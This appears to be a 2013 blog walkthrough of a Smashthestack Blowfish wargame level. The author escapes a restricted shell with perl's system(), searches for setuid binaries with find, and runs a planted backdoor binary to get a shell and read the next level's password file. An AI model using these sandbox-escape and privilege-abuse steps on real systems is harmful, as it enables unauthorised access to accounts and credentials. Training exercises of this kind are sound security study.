Smashthestack.org: Blowfish Level 3

16 Feb 2013

We are now logging in with level3 on blowfish.smashthestack.org. When we enter we see that we are in a restricted environment and have to try and break out. There aren't a lot of commands we can use, so I tabbed to see which were available and which might help us break out the shell.

So I tabbed twice and got these possible commands to execute:

:         builtin   done      fg        let       set       typeset
!         caller    echo      fi        local     shift     ulimit
./        case      elif      for       logout    shopt     umask
[         cd        else      function  perl      source    unalias
[[        command   enable    getopts   popd      suspend   unset
]]        compgen   esac      hash      printf    test      until
{         complete  eval      help      pushd     then      wait
}         continue  exec      history   pwd       time      while
alias     declare   exit      if        read      times
bg        dirs      export    in        readonly  trap
bind      disown    false     jobs      return    true
break     do        fc        kill      select    type

As u see we have perl at our service which makes a great candicate to start executing system commands. I first tried by using backticks, but this didn't work, I haven't got a clue why. Then I tried to execute the command used in level 2 with system:

perl -e "system('/usr/bin/find / -perm -4000');"

This returned:

/usr/bin/find: `/root': Permission denied
/usr/bin/find: `/var/cache/ldconfig': Permission denied
/usr/bin/find: `/var/spool/cron/crontabs': Permission denied
/var/local/.      level4_backdoor
/var/opt/.level3_backdoor
/usr/bin/find: `/home': Permission denied
/usr/bin/find: `/proc': Permission denied
/usr/bin/find: `/etc': Permission denied
/levels/level13
/levels/level11
/levels/level12
/levels/level4
/levels/level7
/levels/level8
/levels/level10
/levels/level5
/levels/level9
/levels/level6
/usr/bin/find: `/boot': Permission denied
/usr/bin/find: `/tmp': Permission denied
/bin/su

We see the

/var/local/.      level4_backdoor

which has spaces. We need to escape the spaces so I executed the same perl command containing the binary with the escaped spaces:

perl -e "system('/var/local/.\ \ \ \ \ \ level4_backdoor');"

We get a shell, YAY. So all that's left is to do:

sh-3.2$ cat /pass/level4
n3xt_l3v3l!

Off to level 4.